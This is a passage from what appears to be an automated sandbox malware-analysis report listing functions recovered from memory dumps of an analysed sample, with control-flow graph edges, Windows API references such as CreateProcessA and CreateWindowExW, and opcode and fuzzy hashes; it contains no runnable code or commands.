444->459 445->459 464 726c929-726c935 446->464 447->446 448->449 449->414 461 726caa2-726caa8 450->461 451->461 454 726cad2-726cad8 452->454 453->454 454->414 457->414 459->414 460->414 461->414 468 726c937 464->468 469 726c93c-726c951 464->469 472 726cb25 466->472 473 726cb2a-726cb40 466->473 467->466 468->469 469->414 472->473 475 726cb47-726cb66 473->475 476 726cb42 473->476 475->414 476->475
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ry$ry$ry
                                                • API String ID: 0-128149707
                                                • Opcode ID: 16c7a54c72eba2d4cda42c3b916b917e82e4442894ee77a1593160b4d2cf99d1
                                                • Instruction ID: 8dd3316749bb50a7969c54611eb0eee5f5891307d86406fcce0275cea12b87db
                                                • Opcode Fuzzy Hash: 16c7a54c72eba2d4cda42c3b916b917e82e4442894ee77a1593160b4d2cf99d1
                                                • Instruction Fuzzy Hash: BBC16CB0D2420ADFCB15DFA5D4894AEFBB2FF89300F10855AD455AB215D774EA82CFA0
                                                Function 0726C7E8 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 479 726c7e8-726c80d 480 726c814-726c852 call 726cd90 479->480 481 726c80f 479->481 483 726c858 480->483 481->480 484 726c85f-726c87b 483->484 485 726c884-726c885 484->485 486 726c87d 484->486 487 726cbdb-726cbe2 485->487 486->483 486->485 486->487 488 726ca63-726ca78 486->488 489 726c900-726c918 486->489 490 726caad-726cab1 486->490 491 726c96d-726c98b 486->491 492 726c88a-726c88e 486->492 493 726c8cb-726c8d4 486->493 494 726cb6b-726cb71 486->494 495 726c9f6-726ca16 486->495 496 726c956-726c968 486->496 497 726ca37-726ca4c 486->497 498 726c8b7-726c8c9 486->498 499 726cb95-726cba1 486->499 500 726c990-726c99c 486->500 501 726ca51-726ca5e 486->501 502 726c9df-726c9f1 486->502 503 726cbbf-726cbd6 486->503 504 726ca7d-726ca81 486->504 505 726cadd-726cae9 486->505 506 726c9ba-726c9da 486->506 507 726ca1b-726ca32 486->507 488->484 516 726c91f 489->516 517 726c91a 489->517 522 726cac4-726cacb 490->522 523 726cab3-726cac2 490->523 491->484 512 726c890-726c89f 492->512 513 726c8a1-726c8a8 492->513 514 726c8d6-726c8e5 493->514 515 726c8e7-726c8ee 493->515 530 726cb79-726cb90 494->530 495->484 496->484 497->484 498->484 518 726cba3 499->518 519 726cba8-726cbba 499->519 510 726c9a3-726c9b5 500->510 511 726c99e 500->511 501->484 502->484 503->484 520 726ca94-726ca9b 504->520 521 726ca83-726ca92 504->521 508 726caf0-726cb06 505->508 509 726caeb 505->509 506->484 507->484 536 726cb0d-726cb23 508->536 537 726cb08 508->537 509->508 510->484 511->510 527 726c8af-726c8b5 512->527 513->527 529 726c8f5-726c8fb 514->529 515->529 534 726c929-726c935 516->534 517->516 518->519 519->484 531 726caa2-726caa8 520->531 521->531 524 726cad2-726cad8 522->524 523->524 524->484 527->484 529->484 530->484 531->484 538 726c937 534->538 539 726c93c-726c951 534->539 542 726cb25 536->542 543 726cb2a-726cb40 536->543 537->536 538->539 539->484 542->543 545 726cb47-726cb66 543->545 546 726cb42 543->546 545->484 546->545
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ry$ry$ry
                                                • API String ID: 0-128149707
                                                • Opcode ID: 17737f502e64509b2559b2e5ca36d565e612f278fcb785f905233c2963126375
                                                • Instruction ID: 100d28a0569484b0d315aa457596df90f0020cc50de42e810476f613c924248b
                                                • Opcode Fuzzy Hash: 17737f502e64509b2559b2e5ca36d565e612f278fcb785f905233c2963126375
                                                • Instruction Fuzzy Hash: EBC14CB0D2420ADFCB14DF95D4898AEFBB2FF89300F10955AD455AB314D7B4A982CFA4
                                                Function 074B4170 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 549 74b4170-74b41a5 550 74b41ac-74b41dd 549->550 551 74b41a7 549->551 552 74b41de 550->552 551->550 553 74b41e5-74b4201 552->553 554 74b420a-74b420b 553->554 555 74b4203 553->555 570 74b4477-74b4480 554->570 555->552 555->554 556 74b438b-74b43b2 555->556 557 74b434b-74b435e 555->557 558 74b442a-74b443c 555->558 559 74b42af-74b42b5 call 74b45c2 555->559 560 74b426c-74b4293 555->560 561 74b4363-74b4378 555->561 562 74b4441-74b4458 555->562 563 74b42e0-74b42f7 555->563 564 74b4298-74b42aa 555->564 565 74b437d-74b4386 555->565 566 74b445d-74b4472 555->566 567 74b42fc-74b430f 555->567 568 74b4413-74b4425 555->568 569 74b4210-74b4252 555->569 555->570 571 74b43b7-74b43ca 555->571 572 74b43f6-74b440e 555->572 573 74b4314-74b4318 555->573 574 74b4254-74b4267 555->574 556->553 557->553 558->553 584 74b42bb-74b42db 559->584 560->553 561->553 562->553 563->553 564->553 565->553 566->553 567->553 568->553 569->553 575 74b43dd-74b43e4 571->575 576 74b43cc-74b43db 571->576 572->553 577 74b432b-74b4332 573->577 578 74b431a-74b4329 573->578 574->553 583 74b43eb-74b43f1 575->583 576->583 580 74b4339-74b4346 577->580 578->580 580->553 583->553 584->553
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TuA$UC;"
                                                • API String ID: 0-2071649361
                                                • Opcode ID: b98c0e3254ce105f4f27a7f8e6ea28ae82ff75993fed0560107d6dd7fd85559e
                                                • Instruction ID: 4600055d7afcc96781dafab046835f4e68e4afa436704386187e0117f5aede96
                                                • Opcode Fuzzy Hash: b98c0e3254ce105f4f27a7f8e6ea28ae82ff75993fed0560107d6dd7fd85559e
                                                • Instruction Fuzzy Hash: BEA14C75D14249DFCB18CFE9E4845DEFBB2EF89310F20982AE415AB264DB349A42CF10
                                                Function 05468AD0 Relevance: 2.6, Instructions: 2604COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1391d250070f20a99e82a4101f3df18c1c8b318d8c4a1eeb89b10bf21b47e348
                                                • Instruction ID: 245af88883c3a93af54e960d901d85aea9de1e42975082c340f5505560d4668a
                                                • Opcode Fuzzy Hash: 1391d250070f20a99e82a4101f3df18c1c8b318d8c4a1eeb89b10bf21b47e348
                                                • Instruction Fuzzy Hash: 1443C474A00219CFDB24DF69C998BD9B7B2BF89300F15819AD519AB3A1CB34ED81CF51
                                                Function 0726A66E Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: z^I
                                                • API String ID: 0-307258731
                                                • Opcode ID: 8b64aaf7d743cc36ac098731c300c94dc1ba91a76737ae0b2e38121245e48e21
                                                • Instruction ID: 95b754730aa66b98e56ff874c272415d06735cb09a8aa4c0f956fecddf68b40c
                                                • Opcode Fuzzy Hash: 8b64aaf7d743cc36ac098731c300c94dc1ba91a76737ae0b2e38121245e48e21
                                                • Instruction Fuzzy Hash: 6F91E3B4E202198FCB08CFAAC9856DEFBB2EF89300F24942AD415BB254D7749945CF54
                                                Function 0726A680 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: z^I
                                                • API String ID: 0-307258731
                                                • Opcode ID: 6b35b545093442abd261ef35c1cc2afa4d13ee27f703183544e479bf3ffc9a7b
                                                • Instruction ID: a62839f6d887f9a91c8c3e72fe3b517ff8c59f599d563b082263385e4016545f
                                                • Opcode Fuzzy Hash: 6b35b545093442abd261ef35c1cc2afa4d13ee27f703183544e479bf3ffc9a7b
                                                • Instruction Fuzzy Hash: 1591C4B4E202198FCB08CFAAC5856AEFBB2FF89300F24942AD515BB354D7749945CF54
                                                Function 074B2AD6 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5=6
                                                • API String ID: 0-2897083178
                                                • Opcode ID: 1f7483f065e9ebc557242242457a83e7c9ab8aa40e7750ca45e8624127d10364
                                                • Instruction ID: 8d721e27c810da6cd447a02db230f4c911c6c268ddbaf1036f5bc2baab9961c6
                                                • Opcode Fuzzy Hash: 1f7483f065e9ebc557242242457a83e7c9ab8aa40e7750ca45e8624127d10364
                                                • Instruction Fuzzy Hash: 19816C74D1934A9FCB15CFA5D8454EEBBB2BF8A300F109867D015E7260EB789A02CF61
                                                Function 074B2B4A Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5=6
                                                • API String ID: 0-2897083178
                                                • Opcode ID: 4c217cfe83d64f875aebd5b74212c272fdebc2671f38b43bd6bbc9a6b62e903d
                                                • Instruction ID: f2e82f4c246991043dce71ebfd9829ddb497706b27feb00bcebd6778c023f3b4
                                                • Opcode Fuzzy Hash: 4c217cfe83d64f875aebd5b74212c272fdebc2671f38b43bd6bbc9a6b62e903d
                                                • Instruction Fuzzy Hash: 2A715C74E1920A9FCB14CFA5D9454EEFBB2BF8A301F10D92AD015E7254EB789A02CF51
                                                Function 05467D68 Relevance: .7, Instructions: 719COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 44def37644ccb76be7d5f7df2c2fe25659ab0ff243180680412b23dd4640e3e7
                                                • Instruction ID: 7dd887dd97b75b9304a20abea9991ebcc5c23ca50aa6e22cf99a912c31136f9c
                                                • Opcode Fuzzy Hash: 44def37644ccb76be7d5f7df2c2fe25659ab0ff243180680412b23dd4640e3e7
                                                • Instruction Fuzzy Hash: 95525D34B001159FDB18DF69C498BAE7BF2BF88314F1581AAE9069B365DB31EC41CB91
                                                Function 072620A4 Relevance: .6, Instructions: 628COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9fdc1cbdb17593e09c3795a99063318be0cb82245253f3d7882bdada0c96723a
                                                • Instruction ID: e199a006b0fc8b4de751c74146e16ae189e7adc26a814a58760960b35e6968b0
                                                • Opcode Fuzzy Hash: 9fdc1cbdb17593e09c3795a99063318be0cb82245253f3d7882bdada0c96723a
                                                • Instruction Fuzzy Hash: DC32AF70E10255DFDB18EFA9C8547AEBBF2AFC8300F14846AD449AB385DB349D81CB95
                                                Function 02D52D18 Relevance: .6, Instructions: 595COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2166981085.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d50000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00343cf76cad84354132617d9163dd27495b40dbd2df2e634397694d9c865683
                                                • Instruction ID: b4a78f0a30b904c937bac53f8cfc9d38e1b7c60ae1581e82a066a807f3c9b629
                                                • Opcode Fuzzy Hash: 00343cf76cad84354132617d9163dd27495b40dbd2df2e634397694d9c865683
                                                • Instruction Fuzzy Hash: F522BA30B012148FDB19DB7AC550BAEB7F6AF89704F2480AEE9469B3A1CB70DD05CB51
                                                Function 05466888 Relevance: .3, Instructions: 313COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 343fed34af2ceb62a12a2e61b02ee9b3cf992100e00cdcbb54484dc4318b9eed
                                                • Instruction ID: d8ad48e29eb23b64c58117e2000ae5cd2025b6d43dcdcd45772dcabb3384d921
                                                • Opcode Fuzzy Hash: 343fed34af2ceb62a12a2e61b02ee9b3cf992100e00cdcbb54484dc4318b9eed
                                                • Instruction Fuzzy Hash: 5EB17F72E001198FD704DBA9C845ADEFBF2AFC8210F19867AD458EB395DA30DD52CB91
                                                Function 07264798 Relevance: .3, Instructions: 286COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34807a93ca8fcc7b55809fb532e195ff28803ada5261fc58cbbf2662e529faeb
                                                • Instruction ID: 574fd063f2ecab70d8d579c6dc5b53e71aa900e491fe8f52d0878da50a9d2827
                                                • Opcode Fuzzy Hash: 34807a93ca8fcc7b55809fb532e195ff28803ada5261fc58cbbf2662e529faeb
                                                • Instruction Fuzzy Hash: 7FC18FB0D10295DFDB14EFA5C88479DBBF2AF89300F14C56AD489AB255EB30DA85CF90
                                                Function 074B4A71 Relevance: .3, Instructions: 261COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b453f46d78be7a361e6489cbbe8e755271c775b16c55e48ccc1fb1495b4f3119
                                                • Instruction ID: bd0672e7bacf1bbceda6134aeee85ee7c7b58f11677850d155a9ffd192552392
                                                • Opcode Fuzzy Hash: b453f46d78be7a361e6489cbbe8e755271c775b16c55e48ccc1fb1495b4f3119
                                                • Instruction Fuzzy Hash: BDB109B1D15249DFCB28CFEAD5806EEFBB6BF89304F20942AD115AB255D7349A06CF10
                                                Function 02D50C08 Relevance: .2, Instructions: 167COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2166981085.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d50000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: adbd481185abd39ff58bbf0a83632acd555a33e010d5b6fce9532976924a8cfe
                                                • Instruction ID: 8c6932c6f66dd773553f8bd0d980956225684b1f3a78e408a938be0de264a0ca
                                                • Opcode Fuzzy Hash: adbd481185abd39ff58bbf0a83632acd555a33e010d5b6fce9532976924a8cfe
                                                • Instruction Fuzzy Hash: 5F611C71D05629CBEB28CF66C8447EDB7B6BF89301F14D1EAD84DA6250EBB05A85CF40
                                                Function 074B9250 Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c3a2f66b3485bc186e8b6cae37f00c168c77f1985bd3897beff8155fd5f71b3
                                                • Instruction ID: 5cba3c822b6acfe5812f3bfe446af7ac18de7c92077719e9a6e950de28b71b0b
                                                • Opcode Fuzzy Hash: 3c3a2f66b3485bc186e8b6cae37f00c168c77f1985bd3897beff8155fd5f71b3
                                                • Instruction Fuzzy Hash: C8317EB1D15219CFDB28CFAAD8447EEBBB6AFCA300F04C46AC509A6255DB341946CF60
                                                Function 0726B968 Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4efcf19242c537f374f11e6ee0c41a9ce2b76ae9a8ce87fab88fbe415ddcf50e
                                                • Instruction ID: afbc1acd7bf7d19cdc384eeb7efb0e4a83e75379777aa3a478873dda6115e394
                                                • Opcode Fuzzy Hash: 4efcf19242c537f374f11e6ee0c41a9ce2b76ae9a8ce87fab88fbe415ddcf50e
                                                • Instruction Fuzzy Hash: 15316DB1E106588FDB18CF96D8486DEBBB7AFC9310F14C06AD409AA224DB755A86CF50
                                                Function 074BEE70 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1357 74bee70-74bef05 1359 74bef3e-74bef5e 1357->1359 1360 74bef07-74bef11 1357->1360 1365 74bef60-74bef6a 1359->1365 1366 74bef97-74befc6 1359->1366 1360->1359 1361 74bef13-74bef15 1360->1361 1363 74bef38-74bef3b 1361->1363 1364 74bef17-74bef21 1361->1364 1363->1359 1367 74bef23 1364->1367 1368 74bef25-74bef34 1364->1368 1365->1366 1369 74bef6c-74bef6e 1365->1369 1376 74befc8-74befd2 1366->1376 1377 74befff-74bf0b9 CreateProcessA 1366->1377 1367->1368 1368->1368 1370 74bef36 1368->1370 1371 74bef91-74bef94 1369->1371 1372 74bef70-74bef7a 1369->1372 1370->1363 1371->1366 1374 74bef7e-74bef8d 1372->1374 1375 74bef7c 1372->1375 1374->1374 1378 74bef8f 1374->1378 1375->1374 1376->1377 1379 74befd4-74befd6 1376->1379 1388 74bf0bb-74bf0c1 1377->1388 1389 74bf0c2-74bf148 1377->1389 1378->1371 1380 74beff9-74beffc 1379->1380 1381 74befd8-74befe2 1379->1381 1380->1377 1383 74befe6-74beff5 1381->1383 1384 74befe4 1381->1384 1383->1383 1385 74beff7 1383->1385 1384->1383 1385->1380 1388->1389 1399 74bf14a-74bf14e 1389->1399 1400 74bf158-74bf15c 1389->1400 1399->1400 1401 74bf150 1399->1401 1402 74bf15e-74bf162 1400->1402 1403 74bf16c-74bf170 1400->1403 1401->1400 1402->1403 1404 74bf164 1402->1404 1405 74bf172-74bf176 1403->1405 1406 74bf180-74bf184 1403->1406 1404->1403 1405->1406 1407 74bf178 1405->1407 1408 74bf196-74bf19d 1406->1408 1409 74bf186-74bf18c 1406->1409 1407->1406 1410 74bf19f-74bf1ae 1408->1410 1411 74bf1b4 1408->1411 1409->1408 1410->1411
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074BF0A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: e121c64066e7aeb6db64cb9cdce7f5cafc974f1e079df238015075b9af627221
                                                • Instruction ID: 94c5a7abf44cc3d5528d5860ea7bfe9bf79acbe68169ca9de9e74caae6012eee
                                                • Opcode Fuzzy Hash: e121c64066e7aeb6db64cb9cdce7f5cafc974f1e079df238015075b9af627221
                                                • Instruction Fuzzy Hash: 8B912BB1D0026ADFDB24DF69CD417DEBBB2AF88310F14856AE808A7250D7749D85CFA1
                                                Function 0140AD68 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1413 140ad68-140ad77 1414 140ada3-140ada7 1413->1414 1415 140ad79-140ad86 call 140a08c 1413->1415 1417 140ada9-140adb3 1414->1417 1418 140adbb-140adfc 1414->1418 1421 140ad88 1415->1421 1422 140ad9c 1415->1422 1417->1418 1424 140ae09-140ae17 1418->1424 1425 140adfe-140ae06 1418->1425 1472 140ad8e call 140aff0 1421->1472 1473 140ad8e call 140b000 1421->1473 1422->1414 1426 140ae19-140ae1e 1424->1426 1427 140ae3b-140ae3d 1424->1427 1425->1424 1429 140ae20-140ae27 call 140a098 1426->1429 1430 140ae29 1426->1430 1432 140ae40-140ae47 1427->1432 1428 140ad94-140ad96 1428->1422 1431 140aed8-140af54 1428->1431 1434 140ae2b-140ae39 1429->1434 1430->1434 1463 140af80-140af98 1431->1463 1464 140af56 1431->1464 1435 140ae54-140ae5b 1432->1435 1436 140ae49-140ae51 1432->1436 1434->1432 1437 140ae68-140ae71 call 140a0a8 1435->1437 1438 140ae5d-140ae65 1435->1438 1436->1435 1444 140ae73-140ae7b 1437->1444 1445 140ae7e-140ae83 1437->1445 1438->1437 1444->1445 1446 140aea1-140aea5 1445->1446 1447 140ae85-140ae8c 1445->1447 1452 140aeab-140aeae 1446->1452 1447->1446 1449 140ae8e-140ae9e call 140a0b8 call 140a0c8 1447->1449 1449->1446 1454 140aeb0-140aece 1452->1454 1455 140aed1-140aed7 1452->1455 1454->1455 1467 140afa0-140afcb GetModuleHandleW 1463->1467 1468 140af9a-140af9d 1463->1468 1465 140af58-140af59 1464->1465 1466 140af5a-140af7e 1464->1466 1465->1466 1466->1463 1469 140afd4-140afe8 1467->1469 1470 140afcd-140afd3 1467->1470 1468->1467 1470->1469 1472->1428 1473->1428
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0140AFBE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b644105e316edb754b4acfe238b4b7335ecbdf4c3cf2a05aa49edc171c6bce8a
                                                • Instruction ID: a76b087594de3a5f9f948604dffb38ac48454d98a589c249321029b43cfa0145
                                                • Opcode Fuzzy Hash: b644105e316edb754b4acfe238b4b7335ecbdf4c3cf2a05aa49edc171c6bce8a
                                                • Instruction Fuzzy Hash: DA8147B0A00B058FD725DF2AD04075ABBF1FF88314F108A2ED54A97B91D775E84ACB95
                                                Function 014058ED Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1474 14058ed-14058f4 1475 1405891-14058b9 1474->1475 1476 14058f6 1474->1476 1479 14058c2-14058e3 1475->1479 1480 14058bb-14058c1 1475->1480 1478 14058f8-14059b9 CreateActCtxA 1476->1478 1482 14059c2-1405a1c 1478->1482 1483 14059bb-14059c1 1478->1483 1480->1479 1491 1405a2b-1405a2f 1482->1491 1492 1405a1e-1405a21 1482->1492 1483->1482 1493 1405a40 1491->1493 1494 1405a31-1405a3d 1491->1494 1492->1491 1496 1405a41 1493->1496 1494->1493 1496->1496
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 014059A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 3a486d971f7d133ef2884a26744eb1239d57ed2f586f1dc563e052cd5b8aa5bc
                                                • Instruction ID: 2f539fd8a466f13bb2d8b465602f41cc2a452d898119ffeb7cb595966de5f46c
                                                • Opcode Fuzzy Hash: 3a486d971f7d133ef2884a26744eb1239d57ed2f586f1dc563e052cd5b8aa5bc
                                                • Instruction Fuzzy Hash: 6051F171C00719CBEB25CFAAC8447DEBBF5BF88314F20806AD518AB251D7756945CF91
                                                Function 02E818E4 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1497 2e818e4-2e818ee 1498 2e818f0-2e818f1 1497->1498 1499 2e818f2-2e81956 1497->1499 1498->1499 1500 2e81958-2e8195e 1499->1500 1501 2e81961-2e81968 1499->1501 1500->1501 1502 2e8196a-2e81970 1501->1502 1503 2e81973-2e81a12 CreateWindowExW 1501->1503 1502->1503 1505 2e81a1b-2e81a53 1503->1505 1506 2e81a14-2e81a1a 1503->1506 1510 2e81a60 1505->1510 1511 2e81a55-2e81a58 1505->1511 1506->1505 1512 2e81a61 1510->1512 1511->1510 1512->1512
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02E81A02
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2167842860.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e80000_file.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: e790910ee3ecfa4d21d67344086605ed7913c8301bc8f4c3496c4f6959a45f6b
                                                • Instruction ID: 5a848a1cf341aa13743da769706ad8d316b8a5b7a02723ef06aa365e67717600
                                                • Opcode Fuzzy Hash: e790910ee3ecfa4d21d67344086605ed7913c8301bc8f4c3496c4f6959a45f6b
                                                • Instruction Fuzzy Hash: 1051FFB1C00349DFDF14CF99C984ADEBBB5BF48314F24916AE819AB210D7749886CF90
                                                Function 02E818F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1513 2e818f0-2e81956 1515 2e81958-2e8195e 1513->1515 1516 2e81961-2e81968 1513->1516 1515->1516 1517 2e8196a-2e81970 1516->1517 1518 2e81973-2e81a12 CreateWindowExW 1516->1518 1517->1518 1520 2e81a1b-2e81a53 1518->1520 1521 2e81a14-2e81a1a 1518->1521 1525 2e81a60 1520->1525 1526 2e81a55-2e81a58 1520->1526 1521->1520 1527 2e81a61 1525->1527 1526->1525 1527->1527
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02E81A02
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2167842860.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e80000_file.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: ae0250647ecc12c85220056f3bae4652daed6bbd4c566e24d54a188492b6a0c5
                                                • Instruction ID: a2960662602e8c33bc0d3694ea2303a33cc8f6a2b686d06c97ce3e253f66659c
                                                • Opcode Fuzzy Hash: ae0250647ecc12c85220056f3bae4652daed6bbd4c566e24d54a188492b6a0c5
